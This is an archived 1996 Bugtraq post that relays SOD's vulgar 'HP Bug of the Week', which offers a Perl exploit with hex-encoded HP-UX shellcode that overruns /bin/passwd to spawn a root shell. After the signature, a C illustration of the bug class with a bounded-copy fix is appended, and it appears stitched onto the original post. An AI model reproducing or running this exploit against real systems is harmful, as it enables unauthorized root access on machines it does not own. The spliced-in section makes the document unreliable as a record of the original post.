Bugtraq mailing list archives
HP Bug of the Week!
From: aleph1 () dfw net (Aleph One)
Date: Sat, 23 Nov 1996 08:19:34 -0600
From our SOD friends (http://command.com.inter.net/~sod/); Press D now if
you are easily offended:

This week: If I had a life, I wouldn't spend my Friday nights giving you bugs

Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you haven't come here looking for security holes to HP/UX computers, you've come to the wrong fucking place. Otherwise look no further because you've found the fuckin' mecca of the fuckin' desert. Our goal here is to distribute those HP bugeridoo's as far and wide as is fucking humanly possible, so tell a friend if you have one. We've got a root hole from a buffer overrun in /bin/passwd this week, plus a whole new section called "Other Folks Scripts" that rakes in the wonderful works of other net.scriptors. So come on in, look around, take all you want but eat all you take and as always, start clicking your way to root access with scripts from the motherfuckin' folks at SOD.

Vulgarity rating: 6 (scalawag)

Caveat Emptor

passwd is broked

script for this week

#!/usr/bin/perl
# SOD /bin/passwd buffer overrun

use FileHandle;

# Convert a string of hex digit pairs into the raw bytes they encode.
sub h2cs {
    local($stuff)=@_;
    local($rv);
    while($stuff !~ /^$/) {
        $bob=$stuff;
        $bob =~ s/^(..).*$/$1/;
        $stuff =~ s/^..//;
        $rv.=chr(oct("0x${bob}"));
    }
    return $rv;
}

# Pick parameters by OS release (second dotted field of `uname -r`).
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
    $offset=2102;
    $prealign="AA";    # 2 byte pre
    $postalign="";     # 0 byte post
    $pcoq=h2cs("7b03b463");
} else {
    $offset=2170;      # 2170 works for 9.X...
    $prealign="";      # zero byte pre
    $postalign="PP";   # 2 byte post
    $pcoq=h2cs("7b033018");
}

$nop=h2cs("08210280");

$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails

$data="/bin/sh.";        # Data stuff
$codedata=$code.$data;

# Pad with NOPs so the whole argument comes out at $offset bytes.
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;

$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;

exec("/bin/passwd","$of");

Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
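The hole the script above drives belongs to a well-known class: a command-line argument copied into a fixed-size stack buffer without a length check, so an argument of a couple of kilobytes overwrites whatever sits above the buffer on the stack. The C below is an added illustration, not part of the original post and not SOD's or HP's code. It shows the defect pattern and, beside it, a bounded copy that refuses overlong input, exercised with a constructed 2170-byte argument (the length the script sends on 9.X). The 64-byte buffer size is an assumption; the post does not say how large passwd's own buffer is, only that roughly 2.1 KB overruns it.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for the demonstration; the post gives no figure
 * for passwd's real buffer. */
#define NAME_MAX_LEN 64

/* The defect pattern behind this bug class, shown here only as a comment:
 *
 *     char buf[64];
 *     strcpy(buf, argv[1]);      // no length check
 *
 * would_overflow() reports whether an argument would spill past a buffer of
 * the given size (the terminating NUL needs a byte too, hence >=). */
int would_overflow(size_t bufsize, const char *arg)
{
    return strlen(arg) >= bufsize;
}

/* Hardened form: copy only if the argument fits, otherwise refuse and write
 * nothing.  Returns 0 on success, -1 when the input is too long. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (dstsize == 0 || n >= dstsize)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Constructed test input: 'len' bytes of filler, NUL-terminated.  The
 * content is irrelevant to the length check; only the size matters. */
size_t constructed_arg(char *out, size_t outsize, size_t len)
{
    if (len + 1 > outsize)
        len = outsize - 1;
    memset(out, 'A', len);
    out[len] = '\0';
    return len;
}

/* Self-check: does the hardened copy reject an argument of 'len' bytes
 * when the destination is the assumed NAME_MAX_LEN buffer?
 * Returns 1 if rejected, 0 if it was copied. */
int demo_rejects_long_arg(size_t len)
{
    char arg[4096];
    char name[NAME_MAX_LEN];
    constructed_arg(arg, sizeof arg, len);
    return bounded_copy(name, sizeof name, arg) == -1;
}

int main(void)
{
    char arg[4096];
    char name[NAME_MAX_LEN];
    size_t len = constructed_arg(arg, sizeof arg, 2170);

    printf("argument of %zu bytes vs %d-byte buffer: overflow? %s\n",
           len, NAME_MAX_LEN, would_overflow(sizeof name, arg) ? "yes" : "no");
    printf("bounded_copy of the long argument: %s\n",
           bounded_copy(name, sizeof name, arg) == 0 ? "copied" : "rejected");
    printf("bounded_copy of \"root\": %s\n",
           bounded_copy(name, sizeof name, "root") == 0 ? "copied" : "rejected");
    return 0;
}
```

The length check is the whole fix for this bug class; a setuid program that rejects oversized arguments before touching any fixed buffer has no stack to smash, and an audit trail of argument lengths handed to setuid binaries is a cheap way to spot this kind of probing.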